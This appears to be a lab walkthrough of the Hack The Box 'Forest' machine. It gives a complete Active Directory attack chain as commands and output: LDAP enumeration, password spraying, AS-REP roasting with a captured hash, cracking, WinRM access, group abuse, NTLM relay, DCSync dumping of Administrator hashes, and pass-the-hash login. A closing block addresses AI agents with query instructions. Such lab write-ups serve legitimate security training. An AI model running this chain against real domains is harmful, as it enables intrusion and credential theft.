# HTB Forest

## LDAP 389/TCP - ldapsearch

LDAP normally provides verbose information about the AD. And if anonymous bind is allowed, we can query many of good AD information, such as user information.

### Anonymous (NULL) Bind

<pre><code><strong># ldapsearch null bind
</strong><strong>(-x ) simple (anonymous) authentication, otherwise MD5
</strong>(-s ) scope
(-b ) basedn .. base domain name

ldapsearch -H ldap://10.129.95.210 -x -s base
ldapsearch -H ldap://10.129.95.210:389 -x -b "dc=htb,dc=local"

# Account policy 
 
 [+] Password Info for Domain: HTB
        [+] Minimum password length: 7
        [+] Account Lockout Threshold: None


# Accounts enumeration
ldapsearch -H ldap://10.129.95.210:389 -x -b DC=htb,DC=local "(objectClass=person)" | grep "sAMAccountName:"
...
sAMAccountName: sebastien
sAMAccountName: lucinda
sAMAccountName: andy
sAMAccountName: mark
sAMAccountName: santi
</code></pre>

### Remote Management Users

```
ldapsearch -H ldap://10.129.95.210 -x -b DC=htb,DC=local | grep -A 11 -i "Remote Management Users"
```

## Windapsearch

{% embed url="<https://github.com/ropnop/windapsearch>" %}

```
# install 
git clone https://github.com/ropnop/windapsearch
apt-get install libsasl
pip install ldap
pip install python-ldap     
```

```
python3 windapsearch.py -d htb.local --dc-ip 10.129.95.210 -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.95.210
[+] Getting defaultNamingContext from Root DSE
[+]     Found: DC=htb,DC=local
[+] Attempting bind
[+]     ...success! Binded as: 
[+]      None
[+] Enumerating all AD users
[+]     Found 28 users: 
```

```
python3 windapsearch.py -d htb.local --dc-ip 10.129.95.210 --custom "objectClass=*"
```

## Kerberos - 88/TCP

### kerbrute

{% embed url="<https://github.com/ropnop/kerbrute/releases>" %}

Brute force and enumerate valid AAD accounts with kerbrute

```
wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
```

```
./kerbrute_linux_amd64 passwordspray -d htb.local --dc 10.129.95.210 ./user.txt 'pass' -v

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 06/06/23 - Ronnie Flathers @ropnop

2023/06/06 14:15:55 >  Using KDC(s):
2023/06/06 14:15:55 >   10.129.95.210:88

2023/06/06 14:15:55 >  [!] svc-alfresco@htb.local:pass - Got AS-REP (no pre-auth) but couldn't decrypt - bad password                                                                                         
2023/06/06 14:15:55 >  [!] lucinda@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  [!] mark@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  [!] andy@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  [!] santi@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  [!] sebastien@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  Done! Tested 6 logins (0 successes) in 0.324 seconds

```

```

wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64

```

### Kerberoasting

Identify Kerboros Service Principal Names (SPN) tight to the account using Impacket's GetSPN

```powershell
# list SPNs tight to account
impacket-GetUserSPNs -dc-ip <IP> <Domain/accountName>

# ticket to crack
impacket-GetUserSPNs -dc-ip <IP> <Domain/accountName> --request

the response contains kerberos hash which can be cracked offlien with hashcat or john
```

```
impacket-GetNPUsers htb.local/svc-alfresco -no-pass -dc-ip 10.129.95.210

# store it into file: svc_hash
$krb5asrep$23$svc-alfresco@HTB.LOCAL:ffe734482ed68633483d56361f5fb53e$1e56eced31d90377e3ed00ad0ee02238daa7a06be902100b62ceb6134143c991ab99f42f276fd1d8d5aca0c8e0eeed4bac11b3b2dbc2a2575f5dd73dc9d3c9e25c1371ef7b36a0d3356303ea7b99c1e45d4ff17b25c821a302cc03db11db9a7e1a434a6a676785867472c9f02e8206e275f06e93fba7060bb5d1577d796748518cac9ffad084f8b7ef852f3b18db2b4cd231e1ec3e6a8ea8934842bedb379f5d04a72984c53a18716cddf4c2529d493dfb552d9ae47d99ec0cac30c692de42450eb2ae9ed08688f198f8edddf0ababfdd57dafc40ed02c69361219f294fc039082ccfc1e94a1
```

### Hashcat - Cracking Kerberos ticket

```
hashcat -m 13100 -a 0 svc_hash passwordlist.txt --force --show
```

### Johne The Ripper - Cracking Kerberos ticket

```
john --wordlist=/usr/share/wordlists/rockyou.txt ./svc_hash 
```

<img src="/files/8QEPGUNMODtLHvOqG5C8" alt="" data-size="original">

### Crackmapexec - Test login to account

```
crackmapexec smb 10.129.95.210 -d htb.local -u svc-alfresco -p s3rvice
```

![](/files/FsUXIxw8WlFcr4B1qEwi)

## WinRM

WinRM (5985/TCP) — Microsoft implementation of WS-Management protocol. This can allow a remote connection via PowerShell.

Look for remote management user group

```
ldapsearch -H ldap://10.129.95.210 -x -b DC=htb,DC=local | grep -A 11 -i "Remote Management Users"
```

![](/files/pD6sw5waXrLu4IK7dS5m)

```
net rpc group members 'Privileged IT Accounts' -W 'htb.local' -I '10.129.95.210' -U'svc-alfresco'%'s3rvice' 2>&1
```

![](/files/UXBZ2P3HF6mpF7CWWcB9)

```
net rpc group members 'Service Accounts' -W 'htb.local' -I '10.129.95.210' -U'svc-alfresco'%'s3rvice' 2>&1
```

![](/files/JR7IQffnRgyvJMu7BFpt)

### Evil-WinRM

```
git clone https://github.com/Hackplayers/evil-winrm

ruby evil-winrm.rb -i 10.129.95.210 -u svc-alfresco -p s3rvice

```

![](/files/GAO5D4M9I8PqePL8nd1G)

```
net group /domain
```

![](/files/AnpRkHgm3JyVaVHtYco2)

Abusing privileges of "Account Operators" see bellow in [BloodHound](#bloodhound-and-neo4j) inspection we continue with the privilege escalation by adding new user using DSYNC attack.

## DSYNC Attack thhrough - Exchange Trusted Subsystem group

{% embed url="<https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/>" %}

### Create domain account

```
PS C:\> net user bigb0ss bigb0ss /add /domain
PS C:\> net group "Exchange Trusted Subsystem" bigb0ss /add /domain
PS C:\> net user bigb0ss /domain
```

![](/files/o4oQKXcmRbyVQCsBi9Ij)

### Impacket NTLM Relay&#x20;

Impacket’s ntlmrelayx.py performs NTLM Relay Attacks, creating an SMB and HTTP server and relaying credentials to various different protocols (SMB, HTTP, LDAP, etc.).

```powershell
# kali terminal1
cd /usr/share/doc/python3-impacket/examples/
./ntlmrelayx.py -t ldap://10.129.95.210 --escalate-user bigb0ss
```

### DSYNC attack - Dump Administrator LM/NT hash

<pre class="language-powershell"><code class="lang-powershell"><strong># kali terminal2
</strong><strong>secretsdump.py htb.local/bigb0ss:bigb0ss@10.129.95.210 -just-dc-user administrator
</strong></code></pre>

```powershell
# kali terminal2
impacket-secretsdump htb.local/bigb0ss:bigb0ss@10.129.95.210 -just-dc-user administrator
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
[*] Cleaning up... 

```

### PSEXEC - Login as administrator using hash

```
impact-psexec htb.local/administrator@10.129.95.210 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
```

![](/files/NqXv8SQBYdRCbkRVkpZI)

EOF\
\
The following BloodHound analysis....

## BloodHound Kali - igestor based on impacket

Python based igestor based on impackets

{% embed url="<https://github.com/fox-it/BloodHound.py>" %}

```
pip install impacter
pip install ldap3
pip install bloodhound

git clone https://github.com/fox-it/BloodHound.py.git

./bloodhound.py -u svc-alfresco -p s3rvice -d htb.local -ns 10.129.95.210
```

![](/files/3MgxMTkDII7ckmfNPzTq)

## BloodHound and Neo4j

### Initial setup

```
apt install bloodhound
apt install neo4j

neo4j console
```

Start neo4j console and visit first <http://localhost:7474> password wizard

![](/files/x8sQ90v4111EYmi7Ag8x)

![](/files/2PTZg091Flmz0I9tmLDW)

### Start

```
./BloodHound --no-sandbox
```

![](/files/7Ju3K6EqqzAyTXjBYkVN)

Import data (upload icon)

![](/files/DRlJJb6xCkSarShnaArq)

Set alfresco as owned

![](/files/rVa2j4lqkUwFTFopdtl0)

Click on alfresco and chose "Unrolled membership"

![](/files/Iy35TZogvgjNqqLGVasi)

We can see the user is part of **"Account Operators"** group. Members of this group can create and modify most types of accounts.

Go back to [DSYNC attack](#dsync-attack-thhrough-exchange-trusted-subsystem-group).


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://hackerlab.gitbook.io/wiki.hackerlab.cz/infra-pentesting/active-directory-ad-initial-attacks/htb-forest.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.